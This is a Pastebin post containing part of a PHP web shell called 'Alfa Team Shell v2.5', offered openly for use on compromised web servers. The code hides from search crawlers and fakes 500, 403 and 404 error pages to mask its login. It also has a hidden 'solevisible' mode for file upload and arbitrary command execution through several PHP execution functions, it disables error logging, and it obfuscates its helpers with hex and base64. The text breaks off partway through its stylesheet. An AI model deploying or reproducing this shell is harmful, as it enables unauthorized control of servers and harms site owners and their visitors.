Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //Alfa Team v2.5 Backdoor Removed Shell
- //Orignal Has backdoor in it
- //Surf Safetly
- //N!nj@ X - Team Cyber Assassins..
- $GLOBALS['Alfa_User'] = 'admin';
- //username
- $GLOBALS['Alfa_Pass'] = '56aed7e7485ff03d5605b885b86e947e';
- //md5(password) - default pass: alfa
- $GLOBALS['Alfa_Protect_Shell'] = '0';
- //1 - 0
- $GLOBALS['Alfa_Login_Page'] = 'gui';
- //gui - 500 - 403 - 404
- $GLOBALS['Alfa_Show_Icons'] = '1';
- //1 - 0
- if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')){function __ZW5jb2Rlcg($data){if(empty($data))return;
- $b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
- $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
- $ac = 0;
- $enc = '';
- $tmp_arr = array();
- if(!$data){return $data;
- }do{$o1 = charCodeAt($data, $i++);
- $o2 = charCodeAt($data, $i++);
- $o3 = charCodeAt($data, $i++);
- $bits = $o1 << 16 | $o2 << 8 | $o3;
- $h1 = $bits >> 18 & 0x3f;
- $h2 = $bits >> 12 & 0x3f;
- $h3 = $bits >> 6 & 0x3f;
- $h4 = $bits & 0x3f;
- $tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);
- } while ($i < strlen($data));
- $enc = implode($tmp_arr, '');
- $r = (strlen($data) % 3);
- return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));
- }function charCodeAt($data, $char){ return ord(substr($data, $char, 1));
- }function charAt($data, $char){return substr($data, $char, 1);
- }}else{function __ZW5jb2Rlcg($s){$b='b'.'as'.'e6'.'4_'.'en'.'co'.'de';
- return $b($s);
- }}if(!function_exists('b'.'a'.'se'.'6'.'4_'.'d'.'ec'.'ode')){function __ZGVjb2Rlcg($input){if(empty($input))return;
- $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
- $chr1 = $chr2 = $chr3 = "";
- $enc1 = $enc2 = $enc3 = $enc4 = "";
- $i = 0;
- $output = "";
- $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
- do{$enc1 = strpos($keyStr, substr($input, $i++, 1));
- $enc2 = strpos($keyStr, substr($input, $i++, 1));
- $enc3 = strpos($keyStr, substr($input, $i++, 1));
- $enc4 = strpos($keyStr, substr($input, $i++, 1));
- $chr1 = ($enc1 << 2) | ($enc2 >> 4);
- $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
- $chr3 = (($enc3 & 3) << 6) | $enc4;
- $output = $output . chr((int) $chr1);
- if ($enc3 != 64) {$output = $output . chr((int) $chr2);
- }if ($enc4 != 64) {$output = $output . chr((int) $chr3);
- }$chr1 = $chr2 = $chr3 = "";
- $enc1 = $enc2 = $enc3 = $enc4 = "";
- }while($i < strlen($input));
- return $output;
- }}else{function __ZGVjb2Rlcg($s){$b='b'.'as'.'e6'.'4_'.'de'.'co'.'de';
- return $b($s);
- }}
- $阿尔法词=十六进制转换('666736736265687075726134636f5f746e646978');
- $函数存在=$阿尔法词{0}.$阿尔法词{8}.$阿尔法词{16}.$阿尔法词{12}.$阿尔法词{15}.$阿尔法词{18}.$阿尔法词{13}.$阿尔法词{16}.$阿尔法词{14}.$阿尔法词{5}.$阿尔法词{19}.$阿尔法词{18}.$阿尔法词{3}.$阿尔法词{15}.$阿尔法词{3};
- function 十六进制转换($十六进制){$串='';
- for($计数=0;
- $计数<strlen($十六进制);
- $计数+=2)$串.=chr(hexdec(substr($十六进制,$计数,2)));
- return $串;
- }function 编码器($串){return __ZGVjb2Rlcg($串);
- }function 随机($串){return ord($串);
- }function 内容($串){return @file_get_contents($串);
- }if(!$函数存在("阿尔法功能启动")){function 阿尔法功能启动($阿尔法变量的一个){$阿尔法变量的一个=编码器($阿尔法变量的一个);
- $阿尔法功能启动=0;
- $阿尔法两个变量=0;
- $阿尔法变三=0;
- $阿尔法四个变量=(随机($阿尔法变量的一个[1])<<8)+随机($阿尔法变量的一个[2]);
- $阿尔法五个变量=3;
- $阿尔法六个变量=0;
- $阿尔法七个变量=16;
- $阿尔法变八="";
- $阿尔法九变=strlen($阿尔法变量的一个);
- $阿尔法变量十=__FILE__;
- $阿尔法变量十=内容($阿尔法变量十);
- $阿尔法变量十一=0;
- preg_match(编码器("LyhwcmludHxzcHJpbnR8ZWNobykv"),$阿尔法变量十,$阿尔法变量十一);
- for(;
- $阿尔法五个变量<$阿尔法九变;
- ){if(count($阿尔法变量十一)) exit;
- if($阿尔法七个变量==0){$阿尔法四个变量=(随机($阿尔法变量的一个[$阿尔法五个变量++])<<8);
- $阿尔法四个变量+=随机($阿尔法变量的一个[$阿尔法五个变量++]);
- $阿尔法七个变量=16;
- }if($阿尔法四个变量&0x8000){$阿尔法功能启动=(随机($阿尔法变量的一个[$阿尔法五个变量++])<<4);
- $阿尔法功能启动+=(随机($阿尔法变量的一个[$阿尔法五个变量])>>4);
- if($阿尔法功能启动){$阿尔法两个变量=(随机($阿尔法变量的一个[$阿尔法五个变量++])&0x0F)+3;
- for($阿尔法变三=0;
- $阿尔法变三<$阿尔法两个变量;
- $阿尔法变三++)$阿尔法变八[$阿尔法六个变量+$阿尔法变三]=$阿尔法变八[$阿尔法六个变量-$阿尔法功能启动+$阿尔法变三];
- $阿尔法六个变量+=$阿尔法两个变量;
- }else{$阿尔法两个变量=(随机($阿尔法变量的一个[$阿尔法五个变量++])<<8);
- $阿尔法两个变量+=随机($阿尔法变量的一个[$阿尔法五个变量++])+16;
- for($阿尔法变三=0;
- $阿尔法变三<$阿尔法两个变量;
- $阿尔法变八[$阿尔法六个变量+$阿尔法变三++]=$阿尔法变量的一个[$阿尔法五个变量]);
- $阿尔法五个变量++;
- $阿尔法六个变量+=$阿尔法两个变量;
- }}else $阿尔法变八[$阿尔法六个变量++]=$阿尔法变量的一个[$阿尔法五个变量++];
- $阿尔法四个变量<<=1;
- $阿尔法七个变量--;
- if($阿尔法五个变量==$阿尔法九变){$阿尔法变量十=implode("",$阿尔法变八);
- $阿尔法变量十="?".">".$阿尔法变量十;
- return $阿尔法变量十;
- }}}}
- ?><?php if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");
- if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');
- exit;
- }} if(!isset($GLOBALS['Alfa_User']))exit('$GLOBALS[\'Alfa_User\']');
- if(!isset($GLOBALS['Alfa_Pass']))exit('$GLOBALS[\'Alfa_Pass\']');
- if(!isset($GLOBALS['Alfa_Protect_Shell']))exit('$GLOBALS[\'Alfa_Protect_Shell\']');
- if(!isset($GLOBALS['Alfa_Login_Page']))exit('$GLOBALS[\'Alfa_Login_Page\']');
- if(!isset($GLOBALS['Alfa_Show_Icons']))exit('$GLOBALS[\'Alfa_Show_Icons\']');
- $GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
- $config = array('AlfaUser' => $GLOBALS['Alfa_User'],'AlfaPass' => $GLOBALS['Alfa_Pass'],'AlfaProtectShell' => $GLOBALS['Alfa_Protect_Shell'],'AlfaLoginPage' => $GLOBALS['Alfa_Login_Page']);
- @session_start();
- if($config['AlfaProtectShell']){ $Eform='<form method="post"><input style="margin:0;
- background-color:#fff;
- border:1px solid #fff;
- " type="password" name="password"></form>';
- if($config['AlfaLoginPage'] == 'gui'){ if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser'];
- @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
- @header('location: '.$_SERVER["PHP_SELF"]);
- } echo '
- <style>
- body{background: black;
- }
- #loginbox { font-size:11px;
- color:green;
- right:85px;
- width:1200px;
- height:200px;
- border-radius:5px;
- -moz-boder-radius:5px;
- position:fixed;
- top:250px;
- }
- #loginbox td { border-radius:5px;
- font-size:11px;
- }
- </style>
- <title>~ ALFA TEaM SHELL-v2.5 ~</title><center>
- <center><img style="border-radius:100px;
- " width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
- <div id=loginbox><p><font face="verdana,arial" size=-1>
- <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
- <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;
- padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM SHELL-v2.5 ~</b></font></th></tr>
- <tr><td bgcolor="black" style="padding:5">
- <form method="post">
- <input type="hidden" name="action" value="login">
- <input type="hidden" name="hide" value="">
- <center><table>
- <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';
- }"></td></tr>
- <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';
- "></td></tr>
- <tr><td><font face="verdana,arial" size=-1>
- </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
- </div><br /></center>';
- exit;
- } }elseif($config['AlfaLoginPage']=='500'){ if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser'];
- @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
- header('location: '.$_SERVER["PHP_SELF"]);
- } echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$_SERVER["SERVER_SIGNATURE"].'</body></html>'.$Eform;
- exit;
- } }elseif($config['AlfaLoginPage']=='403'){ if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser'];
- @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
- header('location: '.$_SERVER["PHP_SELF"]);
- } echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$_SERVER['SERVER_SIGNATURE']."</body></html>".$Eform;
- exit;
- } }elseif($config['AlfaLoginPage']=='404'){ if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){ if(@md5($_POST["password"])==$config['AlfaPass']){ @$_SESSION["AlfaUser"] = $config['AlfaUser'];
- @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
- header('location: '.$_SERVER["PHP_SELF"]);
- } echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$_SERVER['SERVER_SIGNATURE']."</body></html>".$Eform;
- exit;
- } } } if(isset($_POST['ajax'])){ function AlfaNum(){ $args = func_get_args();
- $alfax = array();
- $find = array();
- for($i=1;
- $i<=10;
- $i++){ $alfax[] = $i;
- } foreach($args as $arg){ $find[] = $arg;
- } echo '<script>';
- foreach($alfax as $alfa){ if(in_array($alfa,$find)) continue;
- echo 'alfa'.$alfa."_=";
- } echo '""</script>';
- }} function alfaEx($in,$re=false){ $out='';
- if($re)$in=$in." 2>&1";
- if(function_exists('exec')){ @exec($in,$out);
- $out = @join("\n",$out);
- }elseif(function_exists('passthru')) { ob_start();
- @passthru($in);
- $out = ob_get_clean();
- }elseif(function_exists('system')){ ob_start();
- @system($in);
- $out = ob_get_clean();
- } elseif (function_exists('shell_exec')) { $out = shell_exec($in);
- }elseif(is_resource($f = @popen($in,"r"))){ $out = "";
- while(!@feof($f)) $out .= fread($f,1024);
- pclose($f);
- }elseif(function_exists('proc_open')){ $pipes = array();
- $process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
- $out=@stream_get_contents($pipes[1]);
- }elseif(class_exists('COM')){ $alfaWs = new COM('WScript.shell');
- $exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
- $stdout = $exec->StdOut();
- $out=$stdout->ReadAll();
- } return $out;
- } if(isset($_GET["solevisible"])){ @error_reporting(E_ALL ^ E_NOTICE);
- echo '<html>';
- echo "<title>Solevisible Hidden Shell</title>";
- echo "<body bgcolor=#000000>";
- echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
- $safe_mode = @ini_get('safe_mode');
- if($safe_mode){$r = "<b style='color: red'>On</b>";
- }else{$r = "<b style='color: green'>Off</b>";
- } echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
- echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
- echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
- echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
- echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
- echo"<font color=#7CFC00>Disabled functions : </font>";
- $disfun = @ini_get('disable_functions');
- if(empty($disfun)){$disfun = '<font color="green">NONE</font>';
- } echo"<font color=red>";
- echo "$disfun";
- echo"</font><br>";
- echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
- echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
- echo '<hr><center><form onSubmit="this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));
- " action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
- echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="_upl" type="submit" id="_upl" value="Upload"></p></form></center>';
- if(@$_POST['_upl'] == "Upload"){ if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;
- )</font></a><font color="#7CFC00"></b><br><br></center>';
- } else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>';
- } } echo '<hr><form onSubmit="this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));
- " method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="Execute" value="Execute" type="submit"><br></form>
- <hr><pre>';
- if($_POST['command_solevisible']){ $solevisible = __ZGVjb2Rlcg($_POST['command_solevisible']);
- echo alfaEx($solevisible);
- } echo'</pre>
- </body></html>';
- exit;
- } @error_reporting(E_ALL ^ E_NOTICE);
- @session_start();
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('magic_quotes_runtime', 0);
- @set_time_limit(0);
- if(function_exists('set_magic_quotes_runtime')){ @set_magic_quotes_runtime(0);
- } foreach($_POST as $key => $value){ if(is_array($_POST[$key])){ $i=0;
- foreach($_POST[$key] as $f) { $f = trim(str_replace(' ', '+',$f));
- $_POST[$key][$i] = __ZGVjb2Rlcg($f);
- $i++;
- } }else{ $value = trim(str_replace(' ', '+',$value));
- $_POST[$key] = __ZGVjb2Rlcg($value);
- } } $default_action = 'FilesMan';
- $default_use_ajax = true;
- $default_charset = 'Windows-1251';
- if(strtolower(substr(PHP_OS,0,3))=="win") $GLOBALS['sys']='win';
- else $GLOBALS['sys']='unix';
- $GLOBALS['home_cwd'] = @getcwd();
- if(isset($_POST['c'])){ @chdir($_POST['c']);
- } $GLOBALS['cwd'] = @getcwd();
- if($GLOBALS['sys'] == 'win'){ $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
- $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
- } if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
- function alfahead(){ if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;
- }}$temp = tempnam($GLOBALS['__file_path'], '');
- if (file_exists($temp)) {unlink($temp);
- return dirname($temp);
- }return null;
- }}
- define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
- define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
- if(!isset($_POST['ajax'])){ function Alfa_GetDisable_Function(){ $disfun = @ini_get('disable_functions');
- if(empty($disfun))return('<font color="#0F0">All Functions Accessible</font>');
- $s = explode(',',$disfun);
- $s = array_unique($s);
- $i=0;
- $func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
- foreach($s as $d){ $d=trim($d);
- if(empty($d))continue;
- if(!function_exists($d)){ if(in_array($d,$func)){ $dis .= $d." | ";
- }$i++;
- } } return('<font color="red">'.$dis.'</font><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');
- ">See More Disabled Functions ('.$i.')</a>');
- } function AlfaNum(){ $args = func_get_args();
- $alfax = array();
- $find = array();
- for($i=1;
- $i<=10;
- $i++){ $alfax[] = $i;
- } foreach($args as $arg){ $find[] = $arg;
- } echo '<script>';
- foreach($alfax as $alfa){ if(in_array($alfa,$find)) continue;
- echo 'alfa'.$alfa."_=";
- } echo '""</script>';
- } if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
- $freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
- $totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
- $totalSpace = $totalSpace?$totalSpace:1;
- $on="<font color=#0F0> ON </font>";
- $of="<font color=red> OFF </font>";
- $none="<font color=#0F0> NONE </font>";
- if(function_exists('ssh2_connect')) $ssh2=$on;
- else $ssh2=$of;
- if(function_exists('curl_version')) $curl=$on;
- else $curl=$of;
- if(function_exists('mysql_get_client_info')) $mysql=$on;
- else $mysql=$of;
- if(function_exists('mssql_connect')) $mssql=$on;
- else $mssql=$of;
- if(function_exists('pg_connect')) $pg=$on;
- else $pg=$of;
- if(function_exists('oci_connect')) $or=$on;
- else $or=$of;
- if(@ini_get('disable_functions')) $disfun=@ini_get('disable_functions');
- else $disfun="All Functions Enable";
- if(@ini_get('safe_mode')) $safe_modes="<font color=red>ON</font>";
- else $safe_modes="<font color=#0F0 >OFF</font>";
- if(@ini_get('open_basedir')) $open_b=@ini_get('open_basedir');
- else $open_b=$none;
- if(@ini_get('safe_mode_exec_dir')) $safe_exe=@ini_get('safe_mode_exec_dir');
- else $safe_exe=$none;
- if(@ini_get('safe_mode_include_dir')) $safe_include=@ini_get('safe_mode_include_dir');
- else $safe_include=$none;
- if(!function_exists('posix_getegid')) { $user = @get_current_user();
- $uid = @getmyuid();
- $gid = @getmygid();
- $group = "?";
- }else{ $uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array();
- $gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array();
- $user = $uid['name'];
- $uid = $uid['uid'];
- $group = $gid['name'];
- $gid = $gid['gid'];
- } $cwd_links = '';
- $path = explode("/", $GLOBALS['cwd']);
- $n=count($path);
- for($i=0;
- $i<$n-1;
- $i++) { $cwd_links .= "<a href='javascript:void(0);
- ' onclick='g(\"FilesMan\",\"";
- for($j=0;
- $j<=$i;
- $j++) $cwd_links .= $path[$j].'/';
- $cwd_links .= "\")'>".$path[$i]."/</a>";
- } $drives = "";
- foreach(range('a','z') as $drive) if(@is_dir($drive.':\\')) $drives .= '<a href="javascript:void(0);
- " onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
- $csscode =' -moz-animation-name: spin;
- -moz-animation-iteration-count: infinite;
- -moz-animation-timing-function: linear;
- -moz-animation-duration: 1s;
- -webkit-animation-name: spin;
- -webkit-animation-iteration-count: infinite;
- -webkit-animation-timing-function: linear;
- -webkit-animation-duration: 1s;
- -ms-animation-name: spin;
- -ms-animation-iteration-count: infinite;
- -ms-animation-timing-function: linear;
- -ms-animation-duration: 1s;
- animation-name: spin;
- animation-iteration-count: infinite;
- animation-timing-function: linear;
- animation-duration: 1s;
- ';
- echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html;
- charset=utf-8" />
- <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
- <link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
- <title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM SHELL-v2.5 ::..</title>
- <style type="text/css">
- keyframes spin {from {transform: rotate(0deg);
- }to{transform: rotate(360deg);
- }}
- @-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);
- }to {-webkit-transform: rotate(360deg);
- }}
- @-moz-keyframes spin {from {-moz-transform: rotate(0deg);
- }to {-moz-transform: rotate(360deg);
- }}
- @-ms-keyframes spin {from {-ms-transform: rotate(0deg);
- }to {-ms-transform: rotate(360deg);
- }}
- #alfaloader{'.$csscode.'width:100px;
- height:100px;
- }
- #a_loader{'.$csscode.'width:150px;
- height:150px;
- position:fixed;
- z-index:999999;
- top: 42%;
- left: 45%;
- display:none;
- }
- .ajaxarea{border:1px solid #0E304A;
- color:#67ABDF}#up_bar{background-color:red;
- width:0;
- height:2px;
- display:none;
- position:fixed;
- z-index:100000}#hidden_sh{background-color:#0E304A;
- text-align:center;
- position:absolute;
- right:0;
- left:90%;
- border-bottom-left-radius:2em}.alert_green{color:#0F0;
- font-family:"Comic Sans MS";
- font-size:small;
- text-decoration:none}.whole{background-color:#000;
- background-image:url(http://solevisible.com/images/alfabg.png);
- background-position:center;
- background-attachment:fixed;
- background-repeat:no-repeat}.header{height:auto;
- width:auto;
- border:7px solid #0E304A;
- color:#67ABDF;
- font-size:12px;
- font-family:Verdana,Geneva,sans-serif}.header a{color:#0F0;
- text-decoration:none}.header a:hover{color:#FFF;
- text-decoration:none}span{font-weight:bolder;
- color:#FFF}.txtfont{font-family:"Comic Sans MS";
- font-size:small;
- color:#fff;
- display:inline-block}.txtfont_header{font-family:"Comic Sans MS";
- font-size:large;
- display:inline-block;
- color:#59cc33}.tbltxt{font-family:"Comic Sans MS";
- color:#fff;
- font-size:small;
- display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;
- background:transparent;
- box-shadow:0 0 4px #0E304A;
- border-radius:4px;
- height:20px;
- width:250px;
- text-overflow:ellipsis;
- white-space:nowrap;
- cursor:pointer;
- display:inline-block;
- overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;
- border:1px solid #27979B;
- -webkit-border-radius:4px;
- -moz-border-radius:4px;
- border-radius:4px;
- -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
- -moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;
- padding-left:10px}.inputfile span{color:#25ff00;
- width:90px;
- min-height:2em;
- display:inline-block;
- text-overflow:ellipsis;
- white-space:nowrap;
- overflow:hidden;
- vertical-align:top;
- float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');
- background-repeat:no-repeat;
- background-position:float;
- height:100%;
- width:109px;
- color:#fff;
- background-color:#0E304A;
- display:inline-block;
- float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{border:1px solid #0E304A;
- background:transparent;
- box-shadow:0 0 4px #0E304A;
- -webkit-border-radius:4px;
- -moz-border-radius:4px;
- border-radius:100px;
- -webkit-box-shadow:#555 0 0 4px;
- -moz-box-shadow:#555 0 0 4px;
- background-color:#000;
- color:green;
- border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;
- border:1px solid #27979B;
- -webkit-border-radius:4px;
- -moz-border-radius:4px;
- border-radius:100px;
- -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
- -moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['Alfa_Show_Icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;
- cursor:pointer;
- position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";
- display:inline-block;
- width:14px;
- height:13px;
- position:absolute;
- background-color:#aaa;
- box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;
- padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";
- background-color:#0E304A;
- background-image:url('.__showicon('alfamini').');
- background-repeat:no-repeat;
- background-position:50% 50%;
- background-size:14px 14px;
- border:1px solid #0F0;
- box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;
- color:#FFF;
- width:auto;
- border-right-width:7px;
- border-left-width:7px;
- height:auto;
- font-size:12px;
- font-weight:700;
- border-top-width:0;
- border-color:#0E304A;
- border-style:solid}.whole #meunlist ul{text-align:center;
- list-style-type:none;
- margin:0;
- padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;
- padding:0;
- display:inline}.whole #meunlist a{font-family:arial,sans-serif;
- font-size:14px;
- text-decoration:none;
- font-weight:700;
- color:#fff;
- clear:both;
- width:100px;
- margin-right:-6px;
- border-right-width:1px;
- border-right-style:solid;
- border-right-color:#FFF;
- padding:3px 15px}.whole #meunlist a:hover{color:#000;
- background:#646464}.foot{font-family:Verdana,Geneva,sans-serif;
- margin:0;
- padding:0;
- width:100%;
- text-align:center;
- font-size:12px;
- color:#0E304A;
- border-right-width:7px;
- border-left-width:7px;
- border-bottom-width:7px;
- border-bottom-style:solid;
- border-right-style:solid;
- border-right-style:solid;
- border-left-style:solid;
- border-color:#0E304A}#text{text-align:center}input[type=submit]{background-image:url('.__showicon('btn').');
- background-repeat:no-repeat;
- background-position:50% 50%;
- background-size:23px 23px;
- background-color:#000;
- width:30px;
- height:30px;
- border:1px solid #27979B;
- border-radius:100px}textarea{padding:3px;
- color:#999;
- text-shadow:#777 0 0 3px;
- border:1px solid #0E304A;
- background:transparent;
- box-shadow:0 0 4px #0E304A;
- padding:3px;
- -webkit-border-radius:4px;
- -moz-border-radius:4px;
- border-radius:4px;
- -webkit-box-shadow:#555 0 0 4px;
- -moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;
- text-shadow:#060 0 0 6px;
- box-shadow:0 0 4px #27979B;
- border:1px solid #27979B;
- padding:3px;
- -webkit-border-radius:4px;
- -moz-border-radius:4px;
- border-radius:4px;
- -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
- -moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;
- color:#999;
- text-shadow:#777 0 0 3px;
- border:1px solid #0E304A;
- background:transparent;
- box-shadow:0 0 4px #0E304A;
- padding:3px;
- -webkit-border-radius:4px;
- -moz-border-radius:4px;
- border-radius:4px;
- -webkit-box-shadow:#555 0 0 4px;
- -moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;
- text-shadow:#060 0 0 6px;
- box-shadow:0 0 4px #27979B;
- border:2px solid #27979B;
- -moz-border-radius:4px;
- border-radius:100px;
- -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
- -moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;
- text-shadow:#060 0 0 6px;
- box-shadow:0 0 4px #27979B;
- border:1px solid #27979B;
- padding:3px;
- -webkit-border-radius:4px;
- -moz-border-radius:4px;
- border-radius:4px;
- -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
- -moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;
- width:162px;
- color:#FFE;
- text-shadow:#000 0 2px 7px;
- border:1px solid #0E304A;
- background:#000;
- text-decoration:none;
- box-shadow:0 0 4px #0E304A;
- padding:3px;
- -webkit-border-radius:4px;
- -moz-border-radius:4px;
- border-radius:4px;
- -webkit-box-shadow:#555 0 0 4px;
- -moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;
- box-shadow:0 0 4px #27979B;
- padding:3px;
- -webkit-border-radius:4px;
- -moz-border-radius:4px;
- border-radius:4px;
